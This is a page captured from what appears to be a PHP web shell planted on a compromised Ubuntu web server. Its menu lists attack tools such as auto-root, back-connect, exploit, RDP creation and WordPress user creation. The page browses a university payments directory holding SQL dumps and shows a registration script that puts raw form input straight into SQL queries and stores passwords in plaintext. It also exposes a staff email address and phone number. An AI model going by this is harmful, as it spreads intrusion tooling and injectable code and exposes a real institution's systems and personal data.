Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees-old /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
CSS
[ DIR ]
drwxr-xr-x
alumni-form-ag
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css-ag
[ DIR ]
drwxr-xr-x
hosted_php
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
student
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
Checksum.php
642
B
-rw-r--r--
FailedTRAN.php
4.85
KB
-rw-r--r--
ForgetPassword.php
1.87
KB
-rw-r--r--
ForgetPasswordPage.php
3.34
KB
-rw-r--r--
GetHandleRES.php
10.87
KB
-rw-r--r--
Index.html
11.28
KB
-rw-r--r--
Reciept.disabledphp
5.1
KB
-rw-r--r--
Reciept.php
5.1
KB
-rw-r--r--
SendPerformREQ.php
9.45
KB
-rw-r--r--
StatusTRAN.php
5.24
KB
-rw-r--r--
StatusTRANold.php
6.09
KB
-rw-r--r--
account.php
3.11
KB
-rw-r--r--
ack.php
7.08
KB
-rw-r--r--
billdesk.disabledphp
1.86
KB
-rw-r--r--
calendar.css
2.65
KB
-rw-r--r--
calendar.js
16.85
KB
-rw-r--r--
calendar_form.php
18.27
KB
-rw-r--r--
corner-bottomleft.jpg
334
B
-rw-r--r--
corner-bottomright.jpg
341
B
-rw-r--r--
corner-topleft.jpg
335
B
-rw-r--r--
corner-topright.jpg
348
B
-rw-r--r--
database.php
2.3
KB
-rw-r--r--
donatebilldesk.php
2.6
KB
-rw-r--r--
donatehdfc.php
11.19
KB
-rw-r--r--
donationmail.php
5.94
KB
-rw-r--r--
error_log
13.22
MB
-rw-r--r--
formvalidator.php
14.1
KB
-rw-r--r--
giveback.php
19.01
KB
-rw-r--r--
giveback_backup.php
10.46
KB
-rw-r--r--
giveback_beforeeditedbyankit.p...
19.09
KB
-rw-r--r--
history.php
1.9
KB
-rw-r--r--
home.html
1.04
KB
-rw-r--r--
index.php
22.04
KB
-rw-r--r--
index1032015.php
22.05
KB
-rw-r--r--
indexb.php
22.97
KB
-rw-r--r--
indexold.php
23.13
KB
-rw-r--r--
jquery-latest.js
166.11
KB
-rw-r--r--
jquery.js
76.54
KB
-rw-r--r--
login.html
780
B
-rw-r--r--
logo.jpg
9.63
KB
-rw-r--r--
misp.html
14.15
KB
-rw-r--r--
misp.php
12.61
KB
-rw-r--r--
newstudent.php
9.72
KB
-rw-r--r--
pay.php
2.45
KB
-rw-r--r--
paymenthistory.php
1.94
KB
-rw-r--r--
phdcheckstatus.php
1.07
KB
-rw-r--r--
recounsiliation.php
6.15
KB
-rw-r--r--
register.php
2.47
KB
-rw-r--r--
register1.php
2.36
KB
-rw-r--r--
register_workshop.php
7.78
KB
-rw-r--r--
student.php
9.73
KB
-rw-r--r--
submittobill.php
551
B
-rw-r--r--
test.html
2.14
KB
-rw-r--r--
test.php
768
B
-rw-r--r--
thanks.php
4.42
KB
-rw-r--r--
user.php
4.84
KB
-rw-r--r--
userlist.php
472
B
-rw-r--r--
vendor.php
10.63
KB
-rw-r--r--
vendorold.php
9.86
KB
-rw-r--r--
wanted_sql_file.sql
2.33
MB
-rw-r--r--
webiiit_pg.sql
1.42
MB
-rw-r--r--
welcome.backup.php
18.06
KB
-rw-r--r--
welcome.php
23.38
KB
-rw-r--r--
welcome.txt
23.38
KB
-rw-r--r--
welcome1032015.php
23.37
KB
-rw-r--r--
welcomebill.php
5.29
KB
-rw-r--r--
welcomehdfc.php
5.8
KB
-rw-r--r--
welcomeold.php
14.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register_workshop.php
<?php include "database.php"; session_destroy();?> <?php //include the main validation script require_once "formvalidator.php"; $show_form=true; if(isset($_POST['Submit'])) {// The form is submitted //Setup Validations $validator = new FormValidator(); $validator->addValidation("Name","req","Name Field is required"); $validator->addValidation("Password","req","Password is required"); $validator->addValidation("MobileNo","req","Mobile Number is required"); $validator->addValidation("MobileNo","num","Mobile Number should be numeric"); $validator->addValidation("Email","email","The input for Email should be a valid email value"); $validator->addValidation("Email","req","Email is required"); //Now, validate the form if($validator->ValidateForm()) { //Validation success. //Here we can proceed with processing the form //(like sending email, saving to Database etc) // In this example, we just display a message $select = "Select * from user where Email='$_POST[Email]' or ENo='$_POST[eno]'"; $result = mysql_query($select,$db_connection); if($row=mysql_fetch_array($result)) { echo $row['Name']." had already registered with email id: ".$row['Email']." and Enrollment Number: ".$row['ENo']."<br><br> If you forget your password <a href='ForgetPasswordPage.php'>Click Here </a>to retrive it !"; }else { $sql ="INSERT INTO user(Name,Email,Password,Mobile,UType,ENo,Course,Adress) VALUES ('$_POST[Name]','$_POST[Email]','$_POST[Password]','$_POST[MobileNo]',0,'$_POST[eno]','$_POST[Course]','$_POST[address]')"; //echo $sql; if (!mysql_query($sql,$db_connection)) { die('Error: ' . mysql_error()); echo "error"; } else { $UserId= mysql_insert_id($db_connection); //echo "Mail started"; $to=$_POST['Email']; // Recipients email ID $name=$_POST['Name']; // Recipients name $from = "abir@iiitd.ac.in"; $subject = "Welcome to IIIT Delhi - Payment Process"; $message = "<html> <head> <meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body><table width='609' border='0' height='100%' cellpadding='0' cellspacing='0' align='center' style='margin:0; padding-bottom:0'> <tr style='margin:0; padding-bottom:0' bgcolor='#f2f5fc'> <td colspan='3' style='margin:0; padding-bottom:0' align='center'><img src='https://payments.iiitd.edu.in/pg/fees//logo.jpg' style='margin:0; padding-bottom:0'/></td> </tr> <tr> <td width='29' bgcolor='#f2f5fc'> </td> <td style='padding:10px 10px 10px 10px'> <font face='Verdana, Geneva, sans-serif' size='-1'><br>Dear ".$_POST['Name']."<br/>Your mobile number: ".$_POST['MobileNo']." <br />Your enrollment number: ".$_POST['eno']." <br />Your Course: ".$_POST['Course']." <br />Please click the link below to confirm details <br> <a href='https://payments.iiitd.edu.in/pg/fees//welcome.php?ID=".$UserId."&UType=1'>Confirm your Student Registration</a></font><br><br><br></td> <td bgcolor='#f2f5fc' width='29'> </td> </tr> <tr bgcolor='#f2f5fc'> <td colspan='3' bgcolor='#f2f5fc' align='center' >System Manager : Mr. Abir Bhatacharya | <a href='mailto:abir@iiitd.ac.in' target='_blank'>abir@iiitd.ac.in</a></td> </tr> </table></body></html></body></html>";//HTML Body $header = "From: " . $from . "\r\nReply-To: " . $from . ""; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html; charset: utf8\r\n"; $header .= "Return-Path: abir@iiitd.ac.in\r\n"; $sentmail = mail($to,$subject,$message,$header); if(!$sentmail) { echo "Mailer Error: " . $mail->ErrorInfo(); echo "Unable to send mail"; } else { echo "<h2>New Student Registration</h2> <p>Thanks for registering with us <br><br><strong>We've sent an account confermation e-mail to ".$_POST['Email'].". Please click the confermation link in this e-mail to activate your new account</strong>.</p> <p>If you don't receive an e-mail from us soon, please check your Junk and Spam folders; depending on your e-mail settings, automated e-mails can end up there.</p> <p>If you still haven't received the confirmation after 24 hours, please contact us at <a href='mailto:abir@iiitd.ac.in'>abir@iiitd.ac.in</a> or by call at 9718011080 (hours M-F 10:00 AM to 5:00 PM IST).</p>"; } }} $show_form=false; } else { echo "<h3 style='color:#F00'>Errors for new students:</h3>"; $error_hash = $validator->GetErrors(); foreach($error_hash as $inpname => $inp_err) { echo "<p style='color:#F00'>$inp_err</p>\n"; } }//else }//if(isset($_POST['Submit'])) ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" href="http://iiitd.ac.in/sites/default/files/images/site/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="stylesheet" href="CSS/bootstrap.css" type="text/css"> <title>Network on Chip - IIIT Delhi</title> </head> <body bgcolor="#f2f5fc"> <div class="container"> <div class="row" style="margin-top:20px;"> <h1 class="page-header" align="center">Network on Chip - Workshop</h1> <div class="col-lg-5"> <div class="well"> <form name="loginform" method="post" action="welcome.php" id="login-form"> <div class="form-group"> <label for="email">Email address</label> <input class="form-control" type="text" name="email" id="email" tabindex="1"> </div> <div class="form-group"> <label for="pass">Password</label> <input class="form-control" type="password" name="pass" id="pass" tabindex="2"> </div> <input class="btn btn-default" value=" Log In to pay " type="submit" id="login" > </form> </div> </div> <div class="col-lg-7"> <div class="well"> <h3 class="page-header">Register</h3> <form name="loginform" method="post" action="welcome.php" id="login-form"> <div class="form-group"> <label for="name">Full Name</label> <input class="form-control" type="text" name="name" id="name" tabindex="1"> </div> <div class="form-group"> <label for="institute">Institute's Name</label> <input class="form-control" type="text" name="adress" id="institute" tabindex="1"> </div> <div class="form-group"> <label for="mobile">Mobile Number</label> <input class="form-control" type="text" name="mobile" id="mobile" tabindex="1"> </div> <div class="form-group"> <label for="email">Email</label> <input class="form-control" type="email" name="email" id="email" tabindex="1"> </div> <div class="form-group"> <label for="password">Password</label> <input class="form-control" type="password" name="password" id="password" tabindex="1"> </div> <div class="form-group"> <label for="position">Position</label> <select class="form-control" type="email" name="position" id="position" tabindex="1"> <option val="student">Student</option> <option val="professional" selected="true">Professional</option> </select> </div> <input class="btn btn-default" type="submit" name="Submit" value=" Submit " /> </form> </div> </div> </div> </div> </body> </html>
Close